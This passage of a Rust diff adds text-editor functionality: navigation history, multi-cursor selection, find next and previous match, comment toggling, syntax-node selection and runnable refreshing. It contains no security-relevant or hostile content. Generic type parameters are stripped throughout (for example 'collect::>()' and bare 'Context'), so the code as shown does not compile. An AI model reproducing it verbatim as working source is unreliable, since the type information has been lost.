create_nav_history_entry(&mut self, cx: &mut Context) { + self.push_to_nav_history(self.selections.newest_anchor().head(), None, false, cx); + } + + fn push_to_nav_history( + &mut self, + cursor_anchor: Anchor, + new_position: Option, + is_deactivate: bool, + cx: &mut Context, + ) { + if let Some(nav_history) = self.nav_history.as_mut() { + let buffer = self.buffer.read(cx).read(cx); + let cursor_position = cursor_anchor.to_point(&buffer); + let scroll_state = self.scroll_manager.anchor(); + let scroll_top_row = scroll_state.top_row(&buffer); + drop(buffer); + + if let Some(new_position) = new_position { + let row_delta = (new_position.row as i64 - cursor_position.row as i64).abs(); + if row_delta < MIN_NAVIGATION_HISTORY_ROW_DELTA { + return; + } + } + + nav_history.push( + Some(NavigationData { + cursor_anchor, + cursor_position, + scroll_anchor: scroll_state, + scroll_top_row, + }), + cx, + ); + cx.emit(EditorEvent::PushedToNavHistory { + anchor: cursor_anchor, + is_deactivate, + }) + } + } + + pub fn select_to_end(&mut self, _: &SelectToEnd, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + let buffer = self.buffer.read(cx).snapshot(cx); + let mut selection = self.selections.first::(cx); + selection.set_head(buffer.len(), SelectionGoal::None); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(vec![selection]); + }); + } + + pub fn select_all(&mut self, _: &SelectAll, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + let end = self.buffer.read(cx).read(cx).len(); + self.change_selections(None, window, cx, |s| { + s.select_ranges(vec![0..end]); + }); + } + + pub fn select_line(&mut self, _: &SelectLine, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let mut selections = self.selections.all::(cx); + let max_point = display_map.buffer_snapshot.max_point(); + for selection in &mut selections { + let rows = selection.spanned_rows(true, &display_map); + selection.start = Point::new(rows.start.0, 0); + selection.end = cmp::min(max_point, Point::new(rows.end.0, 0)); + selection.reversed = false; + } + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(selections); + }); + } + + pub fn split_selection_into_lines( + &mut self, + _: &SplitSelectionIntoLines, + window: &mut Window, + cx: &mut Context, + ) { + let selections = self + .selections + .all::(cx) + .into_iter() + .map(|selection| selection.start..selection.end) + .collect::>(); + self.unfold_ranges(&selections, true, true, cx); + + let mut new_selection_ranges = Vec::new(); + { + let buffer = self.buffer.read(cx).read(cx); + for selection in selections { + for row in selection.start.row..selection.end.row { + let cursor = Point::new(row, buffer.line_len(MultiBufferRow(row))); + new_selection_ranges.push(cursor..cursor); + } + + let is_multiline_selection = selection.start.row != selection.end.row; + // Don't insert last one if it's a multi-line selection ending at the start of a line, + // so this action feels more ergonomic when paired with other selection operations + let should_skip_last = is_multiline_selection && selection.end.column == 0; + if !should_skip_last { + new_selection_ranges.push(selection.end..selection.end); + } + } + } + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select_ranges(new_selection_ranges); + }); + } + + pub fn add_selection_above( + &mut self, + _: &AddSelectionAbove, + window: &mut Window, + cx: &mut Context, + ) { + self.add_selection(true, window, cx); + } + + pub fn add_selection_below( + &mut self, + _: &AddSelectionBelow, + window: &mut Window, + cx: &mut Context, + ) { + self.add_selection(false, window, cx); + } + + fn add_selection(&mut self, above: bool, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let mut selections = self.selections.all::(cx); + let text_layout_details = self.text_layout_details(window); + let mut state = self.add_selections_state.take().unwrap_or_else(|| { + let oldest_selection = selections.iter().min_by_key(|s| s.id).unwrap().clone(); + let range = oldest_selection.display_range(&display_map).sorted(); + + let start_x = display_map.x_for_display_point(range.start, &text_layout_details); + let end_x = display_map.x_for_display_point(range.end, &text_layout_details); + let positions = start_x.min(end_x)..start_x.max(end_x); + + selections.clear(); + let mut stack = Vec::new(); + for row in range.start.row().0..=range.end.row().0 { + if let Some(selection) = self.selections.build_columnar_selection( + &display_map, + DisplayRow(row), + &positions, + oldest_selection.reversed, + &text_layout_details, + ) { + stack.push(selection.id); + selections.push(selection); + } + } + + if above { + stack.reverse(); + } + + AddSelectionsState { above, stack } + }); + + let last_added_selection = *state.stack.last().unwrap(); + let mut new_selections = Vec::new(); + if above == state.above { + let end_row = if above { + DisplayRow(0) + } else { + display_map.max_point().row() + }; + + 'outer: for selection in selections { + if selection.id == last_added_selection { + let range = selection.display_range(&display_map).sorted(); + debug_assert_eq!(range.start.row(), range.end.row()); + let mut row = range.start.row(); + let positions = + if let SelectionGoal::HorizontalRange { start, end } = selection.goal { + px(start)..px(end) + } else { + let start_x = + display_map.x_for_display_point(range.start, &text_layout_details); + let end_x = + display_map.x_for_display_point(range.end, &text_layout_details); + start_x.min(end_x)..start_x.max(end_x) + }; + + while row != end_row { + if above { + row.0 -= 1; + } else { + row.0 += 1; + } + + if let Some(new_selection) = self.selections.build_columnar_selection( + &display_map, + row, + &positions, + selection.reversed, + &text_layout_details, + ) { + state.stack.push(new_selection.id); + if above { + new_selections.push(new_selection); + new_selections.push(selection); + } else { + new_selections.push(selection); + new_selections.push(new_selection); + } + + continue 'outer; + } + } + } + + new_selections.push(selection); + } + } else { + new_selections = selections; + new_selections.retain(|s| s.id != last_added_selection); + state.stack.pop(); + } + + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(new_selections); + }); + if state.stack.len() > 1 { + self.add_selections_state = Some(state); + } + } + + pub fn select_next_match_internal( + &mut self, + display_map: &DisplaySnapshot, + replace_newest: bool, + autoscroll: Option, + window: &mut Window, + cx: &mut Context, + ) -> Result<()> { + fn select_next_match_ranges( + this: &mut Editor, + range: Range, + reversed: bool, + replace_newest: bool, + auto_scroll: Option, + window: &mut Window, + cx: &mut Context, + ) { + this.unfold_ranges(&[range.clone()], false, auto_scroll.is_some(), cx); + this.change_selections(auto_scroll, window, cx, |s| { + if replace_newest { + s.delete(s.newest_anchor().id); + } + if reversed { + s.insert_range(range.end..range.start); + } else { + s.insert_range(range); + } + }); + } + + let buffer = &display_map.buffer_snapshot; + let mut selections = self.selections.all::(cx); + if let Some(mut select_next_state) = self.select_next_state.take() { + let query = &select_next_state.query; + if !select_next_state.done { + let first_selection = selections.iter().min_by_key(|s| s.id).unwrap(); + let last_selection = selections.iter().max_by_key(|s| s.id).unwrap(); + let mut next_selected_range = None; + + let bytes_after_last_selection = + buffer.bytes_in_range(last_selection.end..buffer.len()); + let bytes_before_first_selection = buffer.bytes_in_range(0..first_selection.start); + let query_matches = query + .stream_find_iter(bytes_after_last_selection) + .map(|result| (last_selection.end, result)) + .chain( + query + .stream_find_iter(bytes_before_first_selection) + .map(|result| (0, result)), + ); + + for (start_offset, query_match) in query_matches { + let query_match = query_match.unwrap(); // can only fail due to I/O + let offset_range = + start_offset + query_match.start()..start_offset + query_match.end(); + let display_range = offset_range.start.to_display_point(display_map) + ..offset_range.end.to_display_point(display_map); + + if !select_next_state.wordwise + || (!movement::is_inside_word(display_map, display_range.start) + && !movement::is_inside_word(display_map, display_range.end)) + { + // TODO: This is n^2, because we might check all the selections + if !selections + .iter() + .any(|selection| selection.range().overlaps(&offset_range)) + { + next_selected_range = Some(offset_range); + break; + } + } + } + + if let Some(next_selected_range) = next_selected_range { + select_next_match_ranges( + self, + next_selected_range, + last_selection.reversed, + replace_newest, + autoscroll, + window, + cx, + ); + } else { + select_next_state.done = true; + } + } + + self.select_next_state = Some(select_next_state); + } else { + let mut only_carets = true; + let mut same_text_selected = true; + let mut selected_text = None; + + let mut selections_iter = selections.iter().peekable(); + while let Some(selection) = selections_iter.next() { + if selection.start != selection.end { + only_carets = false; + } + + if same_text_selected { + if selected_text.is_none() { + selected_text = + Some(buffer.text_for_range(selection.range()).collect::()); + } + + if let Some(next_selection) = selections_iter.peek() { + if next_selection.range().len() == selection.range().len() { + let next_selected_text = buffer + .text_for_range(next_selection.range()) + .collect::(); + if Some(next_selected_text) != selected_text { + same_text_selected = false; + selected_text = None; + } + } else { + same_text_selected = false; + selected_text = None; + } + } + } + } + + if only_carets { + for selection in &mut selections { + let word_range = movement::surrounding_word( + display_map, + selection.start.to_display_point(display_map), + ); + selection.start = word_range.start.to_offset(display_map, Bias::Left); + selection.end = word_range.end.to_offset(display_map, Bias::Left); + selection.goal = SelectionGoal::None; + selection.reversed = false; + select_next_match_ranges( + self, + selection.start..selection.end, + selection.reversed, + replace_newest, + autoscroll, + window, + cx, + ); + } + + if selections.len() == 1 { + let selection = selections + .last() + .expect("ensured that there's only one selection"); + let query = buffer + .text_for_range(selection.start..selection.end) + .collect::(); + let is_empty = query.is_empty(); + let select_state = SelectNextState { + query: AhoCorasick::new(&[query])?, + wordwise: true, + done: is_empty, + }; + self.select_next_state = Some(select_state); + } else { + self.select_next_state = None; + } + } else if let Some(selected_text) = selected_text { + self.select_next_state = Some(SelectNextState { + query: AhoCorasick::new(&[selected_text])?, + wordwise: false, + done: false, + }); + self.select_next_match_internal( + display_map, + replace_newest, + autoscroll, + window, + cx, + )?; + } + } + Ok(()) + } + + pub fn select_all_matches( + &mut self, + _action: &SelectAllMatches, + window: &mut Window, + cx: &mut Context, + ) -> Result<()> { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + + self.push_to_selection_history(); + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + + self.select_next_match_internal(&display_map, false, None, window, cx)?; + let Some(select_next_state) = self.select_next_state.as_mut() else { + return Ok(()); + }; + if select_next_state.done { + return Ok(()); + } + + let mut new_selections = Vec::new(); + + let reversed = self.selections.oldest::(cx).reversed; + let buffer = &display_map.buffer_snapshot; + let query_matches = select_next_state + .query + .stream_find_iter(buffer.bytes_in_range(0..buffer.len())); + + for query_match in query_matches.into_iter() { + let query_match = query_match.context("query match for select all action")?; // can only fail due to I/O + let offset_range = if reversed { + query_match.end()..query_match.start() + } else { + query_match.start()..query_match.end() + }; + let display_range = offset_range.start.to_display_point(&display_map) + ..offset_range.end.to_display_point(&display_map); + + if !select_next_state.wordwise + || (!movement::is_inside_word(&display_map, display_range.start) + && !movement::is_inside_word(&display_map, display_range.end)) + { + new_selections.push(offset_range.start..offset_range.end); + } + } + + select_next_state.done = true; + self.unfold_ranges(&new_selections.clone(), false, false, cx); + self.change_selections(None, window, cx, |selections| { + selections.select_ranges(new_selections) + }); + + Ok(()) + } + + pub fn select_next( + &mut self, + action: &SelectNext, + window: &mut Window, + cx: &mut Context, + ) -> Result<()> { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.push_to_selection_history(); + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + self.select_next_match_internal( + &display_map, + action.replace_newest, + Some(Autoscroll::newest()), + window, + cx, + )?; + Ok(()) + } + + pub fn select_previous( + &mut self, + action: &SelectPrevious, + window: &mut Window, + cx: &mut Context, + ) -> Result<()> { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.push_to_selection_history(); + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let buffer = &display_map.buffer_snapshot; + let mut selections = self.selections.all::(cx); + if let Some(mut select_prev_state) = self.select_prev_state.take() { + let query = &select_prev_state.query; + if !select_prev_state.done { + let first_selection = selections.iter().min_by_key(|s| s.id).unwrap(); + let last_selection = selections.iter().max_by_key(|s| s.id).unwrap(); + let mut next_selected_range = None; + // When we're iterating matches backwards, the oldest match will actually be the furthest one in the buffer. + let bytes_before_last_selection = + buffer.reversed_bytes_in_range(0..last_selection.start); + let bytes_after_first_selection = + buffer.reversed_bytes_in_range(first_selection.end..buffer.len()); + let query_matches = query + .stream_find_iter(bytes_before_last_selection) + .map(|result| (last_selection.start, result)) + .chain( + query + .stream_find_iter(bytes_after_first_selection) + .map(|result| (buffer.len(), result)), + ); + for (end_offset, query_match) in query_matches { + let query_match = query_match.unwrap(); // can only fail due to I/O + let offset_range = + end_offset - query_match.end()..end_offset - query_match.start(); + let display_range = offset_range.start.to_display_point(&display_map) + ..offset_range.end.to_display_point(&display_map); + + if !select_prev_state.wordwise + || (!movement::is_inside_word(&display_map, display_range.start) + && !movement::is_inside_word(&display_map, display_range.end)) + { + next_selected_range = Some(offset_range); + break; + } + } + + if let Some(next_selected_range) = next_selected_range { + self.unfold_ranges(&[next_selected_range.clone()], false, true, cx); + self.change_selections(Some(Autoscroll::newest()), window, cx, |s| { + if action.replace_newest { + s.delete(s.newest_anchor().id); + } + if last_selection.reversed { + s.insert_range(next_selected_range.end..next_selected_range.start); + } else { + s.insert_range(next_selected_range); + } + }); + } else { + select_prev_state.done = true; + } + } + + self.select_prev_state = Some(select_prev_state); + } else { + let mut only_carets = true; + let mut same_text_selected = true; + let mut selected_text = None; + + let mut selections_iter = selections.iter().peekable(); + while let Some(selection) = selections_iter.next() { + if selection.start != selection.end { + only_carets = false; + } + + if same_text_selected { + if selected_text.is_none() { + selected_text = + Some(buffer.text_for_range(selection.range()).collect::()); + } + + if let Some(next_selection) = selections_iter.peek() { + if next_selection.range().len() == selection.range().len() { + let next_selected_text = buffer + .text_for_range(next_selection.range()) + .collect::(); + if Some(next_selected_text) != selected_text { + same_text_selected = false; + selected_text = None; + } + } else { + same_text_selected = false; + selected_text = None; + } + } + } + } + + if only_carets { + for selection in &mut selections { + let word_range = movement::surrounding_word( + &display_map, + selection.start.to_display_point(&display_map), + ); + selection.start = word_range.start.to_offset(&display_map, Bias::Left); + selection.end = word_range.end.to_offset(&display_map, Bias::Left); + selection.goal = SelectionGoal::None; + selection.reversed = false; + } + if selections.len() == 1 { + let selection = selections + .last() + .expect("ensured that there's only one selection"); + let query = buffer + .text_for_range(selection.start..selection.end) + .collect::(); + let is_empty = query.is_empty(); + let select_state = SelectNextState { + query: AhoCorasick::new(&[query.chars().rev().collect::()])?, + wordwise: true, + done: is_empty, + }; + self.select_prev_state = Some(select_state); + } else { + self.select_prev_state = None; + } + + self.unfold_ranges( + &selections.iter().map(|s| s.range()).collect::>(), + false, + true, + cx, + ); + self.change_selections(Some(Autoscroll::newest()), window, cx, |s| { + s.select(selections); + }); + } else if let Some(selected_text) = selected_text { + self.select_prev_state = Some(SelectNextState { + query: AhoCorasick::new(&[selected_text.chars().rev().collect::()])?, + wordwise: false, + done: false, + }); + self.select_previous(action, window, cx)?; + } + } + Ok(()) + } + + pub fn find_next_match( + &mut self, + _: &FindNextMatch, + window: &mut Window, + cx: &mut Context, + ) -> Result<()> { + let selections = self.selections.disjoint_anchors(); + match selections.first() { + Some(first) if selections.len() >= 2 => { + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select_ranges([first.range()]); + }); + } + _ => self.select_next( + &SelectNext { + replace_newest: true, + }, + window, + cx, + )?, + } + Ok(()) + } + + pub fn find_previous_match( + &mut self, + _: &FindPreviousMatch, + window: &mut Window, + cx: &mut Context, + ) -> Result<()> { + let selections = self.selections.disjoint_anchors(); + match selections.last() { + Some(last) if selections.len() >= 2 => { + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select_ranges([last.range()]); + }); + } + _ => self.select_previous( + &SelectPrevious { + replace_newest: true, + }, + window, + cx, + )?, + } + Ok(()) + } + + pub fn toggle_comments( + &mut self, + action: &ToggleComments, + window: &mut Window, + cx: &mut Context, + ) { + if self.read_only(cx) { + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + let text_layout_details = &self.text_layout_details(window); + self.transact(window, cx, |this, window, cx| { + let mut selections = this.selections.all::(cx); + let mut edits = Vec::new(); + let mut selection_edit_ranges = Vec::new(); + let mut last_toggled_row = None; + let snapshot = this.buffer.read(cx).read(cx); + let empty_str: Arc = Arc::default(); + let mut suffixes_inserted = Vec::new(); + let ignore_indent = action.ignore_indent; + + fn comment_prefix_range( + snapshot: &MultiBufferSnapshot, + row: MultiBufferRow, + comment_prefix: &str, + comment_prefix_whitespace: &str, + ignore_indent: bool, + ) -> Range { + let indent_size = if ignore_indent { + 0 + } else { + snapshot.indent_size_for_line(row).len + }; + + let start = Point::new(row.0, indent_size); + + let mut line_bytes = snapshot + .bytes_in_range(start..snapshot.max_point()) + .flatten() + .copied(); + + // If this line currently begins with the line comment prefix, then record + // the range containing the prefix. + if line_bytes + .by_ref() + .take(comment_prefix.len()) + .eq(comment_prefix.bytes()) + { + // Include any whitespace that matches the comment prefix. + let matching_whitespace_len = line_bytes + .zip(comment_prefix_whitespace.bytes()) + .take_while(|(a, b)| a == b) + .count() as u32; + let end = Point::new( + start.row, + start.column + comment_prefix.len() as u32 + matching_whitespace_len, + ); + start..end + } else { + start..start + } + } + + fn comment_suffix_range( + snapshot: &MultiBufferSnapshot, + row: MultiBufferRow, + comment_suffix: &str, + comment_suffix_has_leading_space: bool, + ) -> Range { + let end = Point::new(row.0, snapshot.line_len(row)); + let suffix_start_column = end.column.saturating_sub(comment_suffix.len() as u32); + + let mut line_end_bytes = snapshot + .bytes_in_range(Point::new(end.row, suffix_start_column.saturating_sub(1))..end) + .flatten() + .copied(); + + let leading_space_len = if suffix_start_column > 0 + && line_end_bytes.next() == Some(b' ') + && comment_suffix_has_leading_space + { + 1 + } else { + 0 + }; + + // If this line currently begins with the line comment prefix, then record + // the range containing the prefix. + if line_end_bytes.by_ref().eq(comment_suffix.bytes()) { + let start = Point::new(end.row, suffix_start_column - leading_space_len); + start..end + } else { + end..end + } + } + + // TODO: Handle selections that cross excerpts + for selection in &mut selections { + let start_column = snapshot + .indent_size_for_line(MultiBufferRow(selection.start.row)) + .len; + let language = if let Some(language) = + snapshot.language_scope_at(Point::new(selection.start.row, start_column)) + { + language + } else { + continue; + }; + + selection_edit_ranges.clear(); + + // If multiple selections contain a given row, avoid processing that + // row more than once. + let mut start_row = MultiBufferRow(selection.start.row); + if last_toggled_row == Some(start_row) { + start_row = start_row.next_row(); + } + let end_row = + if selection.end.row > selection.start.row && selection.end.column == 0 { + MultiBufferRow(selection.end.row - 1) + } else { + MultiBufferRow(selection.end.row) + }; + last_toggled_row = Some(end_row); + + if start_row > end_row { + continue; + } + + // If the language has line comments, toggle those. + let mut full_comment_prefixes = language.line_comment_prefixes().to_vec(); + + // If ignore_indent is set, trim spaces from the right side of all full_comment_prefixes + if ignore_indent { + full_comment_prefixes = full_comment_prefixes + .into_iter() + .map(|s| Arc::from(s.trim_end())) + .collect(); + } + + if !full_comment_prefixes.is_empty() { + let first_prefix = full_comment_prefixes + .first() + .expect("prefixes is non-empty"); + let prefix_trimmed_lengths = full_comment_prefixes + .iter() + .map(|p| p.trim_end_matches(' ').len()) + .collect::>(); + + let mut all_selection_lines_are_comments = true; + + for row in start_row.0..=end_row.0 { + let row = MultiBufferRow(row); + if start_row < end_row && snapshot.is_line_blank(row) { + continue; + } + + let prefix_range = full_comment_prefixes + .iter() + .zip(prefix_trimmed_lengths.iter().copied()) + .map(|(prefix, trimmed_prefix_len)| { + comment_prefix_range( + snapshot.deref(), + row, + &prefix[..trimmed_prefix_len], + &prefix[trimmed_prefix_len..], + ignore_indent, + ) + }) + .max_by_key(|range| range.end.column - range.start.column) + .expect("prefixes is non-empty"); + + if prefix_range.is_empty() { + all_selection_lines_are_comments = false; + } + + selection_edit_ranges.push(prefix_range); + } + + if all_selection_lines_are_comments { + edits.extend( + selection_edit_ranges + .iter() + .cloned() + .map(|range| (range, empty_str.clone())), + ); + } else { + let min_column = selection_edit_ranges + .iter() + .map(|range| range.start.column) + .min() + .unwrap_or(0); + edits.extend(selection_edit_ranges.iter().map(|range| { + let position = Point::new(range.start.row, min_column); + (position..position, first_prefix.clone()) + })); + } + } else if let Some((full_comment_prefix, comment_suffix)) = + language.block_comment_delimiters() + { + let comment_prefix = full_comment_prefix.trim_end_matches(' '); + let comment_prefix_whitespace = &full_comment_prefix[comment_prefix.len()..]; + let prefix_range = comment_prefix_range( + snapshot.deref(), + start_row, + comment_prefix, + comment_prefix_whitespace, + ignore_indent, + ); + let suffix_range = comment_suffix_range( + snapshot.deref(), + end_row, + comment_suffix.trim_start_matches(' '), + comment_suffix.starts_with(' '), + ); + + if prefix_range.is_empty() || suffix_range.is_empty() { + edits.push(( + prefix_range.start..prefix_range.start, + full_comment_prefix.clone(), + )); + edits.push((suffix_range.end..suffix_range.end, comment_suffix.clone())); + suffixes_inserted.push((end_row, comment_suffix.len())); + } else { + edits.push((prefix_range, empty_str.clone())); + edits.push((suffix_range, empty_str.clone())); + } + } else { + continue; + } + } + + drop(snapshot); + this.buffer.update(cx, |buffer, cx| { + buffer.edit(edits, None, cx); + }); + + // Adjust selections so that they end before any comment suffixes that + // were inserted. + let mut suffixes_inserted = suffixes_inserted.into_iter().peekable(); + let mut selections = this.selections.all::(cx); + let snapshot = this.buffer.read(cx).read(cx); + for selection in &mut selections { + while let Some((row, suffix_len)) = suffixes_inserted.peek().copied() { + match row.cmp(&MultiBufferRow(selection.end.row)) { + Ordering::Less => { + suffixes_inserted.next(); + continue; + } + Ordering::Greater => break, + Ordering::Equal => { + if selection.end.column == snapshot.line_len(row) { + if selection.is_empty() { + selection.start.column -= suffix_len as u32; + } + selection.end.column -= suffix_len as u32; + } + break; + } + } + } + } + + drop(snapshot); + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(selections) + }); + + let selections = this.selections.all::(cx); + let selections_on_single_row = selections.windows(2).all(|selections| { + selections[0].start.row == selections[1].start.row + && selections[0].end.row == selections[1].end.row + && selections[0].start.row == selections[0].end.row + }); + let selections_selecting = selections + .iter() + .any(|selection| selection.start != selection.end); + let advance_downwards = action.advance_downwards + && selections_on_single_row + && !selections_selecting + && !matches!(this.mode, EditorMode::SingleLine { .. }); + + if advance_downwards { + let snapshot = this.buffer.read(cx).snapshot(cx); + + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_cursors_with(|display_snapshot, display_point, _| { + let mut point = display_point.to_point(display_snapshot); + point.row += 1; + point = snapshot.clip_point(point, Bias::Left); + let display_point = point.to_display_point(display_snapshot); + let goal = SelectionGoal::HorizontalPosition( + display_snapshot + .x_for_display_point(display_point, text_layout_details) + .into(), + ); + (display_point, goal) + }) + }); + } + }); + } + + pub fn select_enclosing_symbol( + &mut self, + _: &SelectEnclosingSymbol, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + + let buffer = self.buffer.read(cx).snapshot(cx); + let old_selections = self.selections.all::(cx).into_boxed_slice(); + + fn update_selection( + selection: &Selection, + buffer_snap: &MultiBufferSnapshot, + ) -> Option> { + let cursor = selection.head(); + let (_buffer_id, symbols) = buffer_snap.symbols_containing(cursor, None)?; + for symbol in symbols.iter().rev() { + let start = symbol.range.start.to_offset(buffer_snap); + let end = symbol.range.end.to_offset(buffer_snap); + let new_range = start..end; + if start < selection.start || end > selection.end { + return Some(Selection { + id: selection.id, + start: new_range.start, + end: new_range.end, + goal: SelectionGoal::None, + reversed: selection.reversed, + }); + } + } + None + } + + let mut selected_larger_symbol = false; + let new_selections = old_selections + .iter() + .map(|selection| match update_selection(selection, &buffer) { + Some(new_selection) => { + if new_selection.range() != selection.range() { + selected_larger_symbol = true; + } + new_selection + } + None => selection.clone(), + }) + .collect::>(); + + if selected_larger_symbol { + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(new_selections); + }); + } + } + + pub fn select_larger_syntax_node( + &mut self, + _: &SelectLargerSyntaxNode, + window: &mut Window, + cx: &mut Context, + ) { + let Some(visible_row_count) = self.visible_row_count() else { + return; + }; + let old_selections: Box<[_]> = self.selections.all::(cx).into(); + if old_selections.is_empty() { + return; + } + + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let buffer = self.buffer.read(cx).snapshot(cx); + + let mut selected_larger_node = false; + let mut new_selections = old_selections + .iter() + .map(|selection| { + let old_range = selection.start..selection.end; + + if let Some((node, _)) = buffer.syntax_ancestor(old_range.clone()) { + // manually select word at selection + if ["string_content", "inline"].contains(&node.kind()) { + let word_range = { + let display_point = buffer + .offset_to_point(old_range.start) + .to_display_point(&display_map); + let Range { start, end } = + movement::surrounding_word(&display_map, display_point); + start.to_point(&display_map).to_offset(&buffer) + ..end.to_point(&display_map).to_offset(&buffer) + }; + // ignore if word is already selected + if !word_range.is_empty() && old_range != word_range { + let last_word_range = { + let display_point = buffer + .offset_to_point(old_range.end) + .to_display_point(&display_map); + let Range { start, end } = + movement::surrounding_word(&display_map, display_point); + start.to_point(&display_map).to_offset(&buffer) + ..end.to_point(&display_map).to_offset(&buffer) + }; + // only select word if start and end point belongs to same word + if word_range == last_word_range { + selected_larger_node = true; + return Selection { + id: selection.id, + start: word_range.start, + end: word_range.end, + goal: SelectionGoal::None, + reversed: selection.reversed, + }; + } + } + } + } + + let mut new_range = old_range.clone(); + let mut new_node = None; + while let Some((node, containing_range)) = buffer.syntax_ancestor(new_range.clone()) + { + new_node = Some(node); + new_range = match containing_range { + MultiOrSingleBufferOffsetRange::Single(_) => break, + MultiOrSingleBufferOffsetRange::Multi(range) => range, + }; + if !display_map.intersects_fold(new_range.start) + && !display_map.intersects_fold(new_range.end) + { + break; + } + } + + if let Some(node) = new_node { + // Log the ancestor, to support using this action as a way to explore TreeSitter + // nodes. Parent and grandparent are also logged because this operation will not + // visit nodes that have the same range as their parent. + log::info!("Node: {node:?}"); + let parent = node.parent(); + log::info!("Parent: {parent:?}"); + let grandparent = parent.and_then(|x| x.parent()); + log::info!("Grandparent: {grandparent:?}"); + } + + selected_larger_node |= new_range != old_range; + Selection { + id: selection.id, + start: new_range.start, + end: new_range.end, + goal: SelectionGoal::None, + reversed: selection.reversed, + } + }) + .collect::>(); + + if !selected_larger_node { + return; // don't put this call in the history + } + + // scroll based on transformation done to the last selection created by the user + let (last_old, last_new) = old_selections + .last() + .zip(new_selections.last().cloned()) + .expect("old_selections isn't empty"); + + // revert selection + let is_selection_reversed = { + let should_newest_selection_be_reversed = last_old.start != last_new.start; + new_selections.last_mut().expect("checked above").reversed = + should_newest_selection_be_reversed; + should_newest_selection_be_reversed + }; + + if selected_larger_node { + self.select_syntax_node_history.disable_clearing = true; + self.change_selections(None, window, cx, |s| { + s.select(new_selections.clone()); + }); + self.select_syntax_node_history.disable_clearing = false; + } + + let start_row = last_new.start.to_display_point(&display_map).row().0; + let end_row = last_new.end.to_display_point(&display_map).row().0; + let selection_height = end_row - start_row + 1; + let scroll_margin_rows = self.vertical_scroll_margin() as u32; + + let fits_on_the_screen = visible_row_count >= selection_height + scroll_margin_rows * 2; + let scroll_behavior = if fits_on_the_screen { + self.request_autoscroll(Autoscroll::fit(), cx); + SelectSyntaxNodeScrollBehavior::FitSelection + } else if is_selection_reversed { + self.scroll_cursor_top(&ScrollCursorTop, window, cx); + SelectSyntaxNodeScrollBehavior::CursorTop + } else { + self.scroll_cursor_bottom(&ScrollCursorBottom, window, cx); + SelectSyntaxNodeScrollBehavior::CursorBottom + }; + + self.select_syntax_node_history.push(( + old_selections, + scroll_behavior, + is_selection_reversed, + )); + } + + pub fn select_smaller_syntax_node( + &mut self, + _: &SelectSmallerSyntaxNode, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + + if let Some((mut selections, scroll_behavior, is_selection_reversed)) = + self.select_syntax_node_history.pop() + { + if let Some(selection) = selections.last_mut() { + selection.reversed = is_selection_reversed; + } + + self.select_syntax_node_history.disable_clearing = true; + self.change_selections(None, window, cx, |s| { + s.select(selections.to_vec()); + }); + self.select_syntax_node_history.disable_clearing = false; + + match scroll_behavior { + SelectSyntaxNodeScrollBehavior::CursorTop => { + self.scroll_cursor_top(&ScrollCursorTop, window, cx); + } + SelectSyntaxNodeScrollBehavior::FitSelection => { + self.request_autoscroll(Autoscroll::fit(), cx); + } + SelectSyntaxNodeScrollBehavior::CursorBottom => { + self.scroll_cursor_bottom(&ScrollCursorBottom, window, cx); + } + } + } + } + + fn refresh_runnables(&mut self, window: &mut Window, cx: &mut Context) -> Task<()> { + if !EditorSettings::get_global(cx).gutter.runnables { + self.clear_tasks(); + return Task::ready(()); + } + let project = self.project.as_ref().map(Entity::downgrade); + let task_sources = self.lsp_task_sources(cx); + cx.spawn_in(window, async move |editor, cx| { + cx.background_executor().timer(UPDATE_DEBOUNCE).await; + let Some(project) = project.and_then(|p| p.upgrade()) else { + return; + }; + let Ok(display_snapshot) = editor.update(cx, |this, cx| { + this.display_map.update(cx, |map, cx| map.snapshot(cx)) + }) else { + return; + }; + + let hide_runnables = project + .update(cx, |project, cx| { + // Do not display any test indicators in non-dev server remote projects. + project.is_via_collab() && project.ssh_connection_string(cx).is_none() + }) + .unwrap_or(true); + if hide_runnables { + return; + } + let new_rows = + cx.background_spawn({ + let snapshot = display_snapshot.clone(); + async move { + Self::fetch_runnable_ranges(&snapshot, Anchor::min()..Anchor::max()) + } + }) + .await; + let Ok(lsp_tasks) = + cx.update(|_, cx| crate::lsp_tasks(project.clone(), &task_sources, None, cx)) + else { + return; + }; + let lsp_tasks = lsp_tasks.await; + + let Ok(mut lsp_tasks_by_rows) = cx.update(|_, cx| { + lsp_tasks + .into_iter() + .flat_map(|(kind, tasks)| { + tasks.into_iter().filter_map(move |(location, task)| { + Some((kind.clone(), location?, task)) + }) + }) + .fold(HashMap::default(), |mut acc, (kind, location, task)| { + let buffer = location.target.buffer; + let buffer_snapshot = buffer.read(cx).snapshot(); + let offset = display_snapshot.buffer_snapshot.excerpts().find_map( + |(excerpt_id, snapshot, _)| { + if snapshot.remote_id() == buffer_snapshot.remote_id() { + 